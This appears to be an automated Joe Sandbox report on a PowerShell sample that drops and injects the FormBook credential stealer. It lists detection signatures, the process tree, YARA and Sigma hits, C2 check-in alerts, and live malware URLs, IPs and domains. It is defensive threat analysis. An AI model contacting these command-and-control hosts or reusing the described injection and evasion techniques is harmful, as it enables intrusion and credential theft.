Edit tour

Windows Analysis Report
ebu.ps1

Overview

General Information

Sample name:	ebu.ps1
Analysis ID:	1615005
MD5:	80d0982659637f1e28b7a90bab9eb8c3
SHA1:	550bf3d7421aa2dbb94840144eb6b41cf3eaad4f
SHA256:	59fb71290ce207860b2c0a30f03c57e63b5ff728636433f8463e7f3f78998cc8
Tags:	196-251-92-64ps1user-JAMESWT_MHT
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 6988 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 36AB0A4F064DF0D6A1D681FFAC61FC2E)

CasPol.exe (PID: 2080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

SrZjbK9j4QXGHBZ.exe (PID: 888 cmdline: "C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\ffFGp3Q2.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

ROUTE.EXE (PID: 7128 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)

SrZjbK9j4QXGHBZ.exe (PID: 5820 cmdline: "C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\RmSTJrc28lAL.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 6996 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

notepad.exe (PID: 7072 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\ebu.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2088815716.0000000003030000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4264972370.0000000004340000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2086505825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4264994740.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4265041424.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.4266897553.0000000005720000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2087258507.00000000017F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4263501995.00000000026E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 6624	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x970:$b1: ::WriteAllBytes( 0x162572:$b1: ::WriteAllBytes( 0x98c:$b2: ::FromBase64String( 0x16258e:$b2: ::FromBase64String( 0xec794:$s1: -join 0xf9869:$s1: -join 0xfcc3b:$s1: -join 0xfd2ed:$s1: -join 0xfedde:$s1: -join 0x100fe4:$s1: -join 0x10180b:$s1: -join 0x10207b:$s1: -join 0x1027b6:$s1: -join 0x1027e8:$s1: -join 0x102830:$s1: -join 0x10284f:$s1: -join 0x10309f:$s1: -join 0x10321b:$s1: -join 0x103293:$s1: -join 0x103326:$s1: -join 0x10358c:$s1: -join
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.CasPol.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4888, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1", ProcessId: 6624, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4888, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ebu.ps1", ProcessId: 6624, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-14T12:22:11.109468+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49820	144.76.229.203	80	TCP
2025-02-14T12:22:14.059970+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49836	144.76.229.203	80	TCP
2025-02-14T12:22:16.679771+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49854	144.76.229.203	80	TCP
2025-02-14T12:22:25.264361+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49908	172.67.207.50	80	TCP
2025-02-14T12:22:27.814946+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49926	172.67.207.50	80	TCP
2025-02-14T12:22:30.386332+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49942	172.67.207.50	80	TCP
2025-02-14T12:22:38.678090+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50001	66.29.133.199	80	TCP
2025-02-14T12:22:41.198033+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50014	66.29.133.199	80	TCP
2025-02-14T12:22:43.862501+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50015	66.29.133.199	80	TCP
2025-02-14T12:22:51.825557+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50017	13.248.169.48	80	TCP
2025-02-14T12:22:54.369882+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50018	13.248.169.48	80	TCP
2025-02-14T12:22:56.976159+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	13.248.169.48	80	TCP
2025-02-14T12:23:05.233183+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	199.59.243.228	80	TCP
2025-02-14T12:23:07.819216+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50022	199.59.243.228	80	TCP
2025-02-14T12:23:10.357549+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50023	199.59.243.228	80	TCP
2025-02-14T12:23:19.077457+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	104.21.16.1	80	TCP
2025-02-14T12:23:21.770304+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	104.21.16.1	80	TCP
2025-02-14T12:23:24.421574+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50027	104.21.16.1	80	TCP
2025-02-14T12:23:33.337847+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	156.224.244.124	80	TCP
2025-02-14T12:23:35.910568+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	156.224.244.124	80	TCP
2025-02-14T12:23:38.529672+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50031	156.224.244.124	80	TCP
2025-02-14T12:23:46.755400+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	13.248.169.48	80	TCP
2025-02-14T12:23:49.323593+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50034	13.248.169.48	80	TCP
2025-02-14T12:23:51.869513+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50035	13.248.169.48	80	TCP
2025-02-14T12:24:03.122659+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50037	13.248.169.48	80	TCP
2025-02-14T12:24:05.648851+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50038	13.248.169.48	80	TCP
2025-02-14T12:24:09.260239+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50039	13.248.169.48	80	TCP
2025-02-14T12:24:16.485107+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50041	185.173.109.83	80	TCP
2025-02-14T12:24:19.104736+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50042	185.173.109.83	80	TCP
2025-02-14T12:24:21.721167+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50043	185.173.109.83	80	TCP
2025-02-14T12:24:29.990220+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50045	13.248.169.48	80	TCP
2025-02-14T12:24:32.526412+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50046	13.248.169.48	80	TCP
2025-02-14T12:24:35.256432+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50047	13.248.169.48	80	TCP
2025-02-14T12:24:43.665957+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50049	103.106.67.112	80	TCP
2025-02-14T12:24:46.237650+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50050	103.106.67.112	80	TCP
2025-02-14T12:24:48.784214+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50051	103.106.67.112	80	TCP
2025-02-14T12:24:56.865133+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50053	13.248.169.48	80	TCP
2025-02-14T12:24:59.396471+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50054	13.248.169.48	80	TCP
2025-02-14T12:25:01.955259+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50055	13.248.169.48	80	TCP
2025-02-14T12:25:13.144586+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50057	66.235.200.146	80	TCP
2025-02-14T12:25:15.690965+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50058	66.235.200.146	80	TCP
2025-02-14T12:25:18.310412+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50059	66.235.200.146	80	TCP
2025-02-14T12:25:26.771851+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50061	13.248.169.48	80	TCP
2025-02-14T12:25:30.372671+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50062	13.248.169.48	80	TCP
2025-02-14T12:25:31.863804+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50063	13.248.169.48	80	TCP
2025-02-14T12:25:49.725698+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50066	144.76.229.203	80	TCP
2025-02-14T12:25:52.253146+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50067	144.76.229.203	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.antobloom.xyz/hzjg/	Avira URL Cloud: Label: malware
Source: http://www.antobloom.xyz/hzjg/?26NtD=ZPldbrB0ORCTO&wdo8x=JM+spcZ+8KKknY6V8Rj+/pD5zFm4RnTnZNOvAwvYRq4bYtMCWKtHUO/1Ii5giDcP6FL8pjCGTrrBoH970pHxhIy5EA6ZmamzWovc34NNBOesZretnjyCH5w=	Avira URL Cloud: Label: malware
Source: https://www.antobloom.xyz/hzjg/?26NtD=ZPldbrB0ORCTO&wdo8x=JM	Avira URL Cloud: Label: malware
Source: http://www.fz977.xyz/48bq/?26NtD=ZPldbrB0ORCTO&wdo8x=pv3DUJe9yPth5S00/ah9/bEmDyU4ctJg85vwg8BMxTkp3aaU2xC7kNpotxOlvsK6c8UP176upV9MEeNzbUWUAPZEMCU/IM/+W9t8mU0ezYbHkBWVG3xo2q0=	Avira URL Cloud: Label: malware
Source: https://www.antobloom.xyz/hzjg/?26NtD=ZPldbrB0ORCTO&wdo8x=JM	Avira URL Cloud: Label: malware
Source: http://www.fz977.xyz/48bq/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for submitted file

Source: ebu.ps1

ReversingLabs: Detection: 24%

Yara detected FormBook

Source: Yara match	File source: 5.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2088815716.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4264972370.0000000004340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2086505825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4264994740.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4265041424.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4266897553.0000000005720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2087258507.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4263501995.00000000026E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source:	Binary string: CZXZSAS.pdbX source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, x.exe.0.dr
Source:	Binary string: route.pdb source: CasPol.exe, 00000005.00000002.2086856939.0000000001488000.00000004.00000020.00020000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 00000009.00000003.2026911638.0000000001294000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: CasPol.exe, 00000005.00000002.2087446071.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000003.2088518397.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265184954.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265184954.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000003.2086792566.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: ROUTE.EXE, 0000000A.00000002.4265729687.000000000345C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4263831483.000000000283E000.00000004.00000020.00020000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000000.2161638897.00000000032EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2387377884.000000001A2AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000005.00000002.2087446071.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 0000000A.00000003.2088518397.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265184954.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265184954.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000003.2086792566.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CZXZSAS.pdb source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, x.exe.0.dr
Source:	Binary string: route.pdbGCTL source: CasPol.exe, 00000005.00000002.2086856939.0000000001488000.00000004.00000020.00020000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 00000009.00000003.2026911638.0000000001294000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SrZjbK9j4QXGHBZ.exe, 00000009.00000002.4263866029.0000000000D3F000.00000002.00000001.01000000.0000000B.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4263503688.0000000000D3F000.00000002.00000001.01000000.0000000B.sdmp

Source: C:\Windows\SysWOW64\ROUTE.EXE

Code function: 10_2_026FC670 FindFirstFileW,FindNextFileW,FindClose,

10_2_026FC670

Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 4x nop then xor eax, eax		10_2_026E9E30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 4x nop then mov ebx, 00000004h		10_2_02D104DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49854 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49908 -> 172.67.207.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49926 -> 172.67.207.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50001 -> 66.29.133.199:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 66.29.133.199:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 156.224.244.124:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 156.224.244.124:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 156.224.244.124:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 66.29.133.199:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50067 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49942 -> 172.67.207.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50061 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 185.173.109.83:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50066 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 185.173.109.83:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50063 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 185.173.109.83:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50062 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.031234440.xyz
Source:	DNS query: www.balivegasbaru2.xyz
Source:	DNS query: www.allenamento.xyz
Source:	DNS query: www.fz977.xyz
Source:	DNS query: www.gnolls.xyz
Source:	DNS query: www.antobloom.xyz
Source:	DNS query: www.crazymeme.xyz
Source:	DNS query: www.shibfestival.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 172.67.207.50 172.67.207.50

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
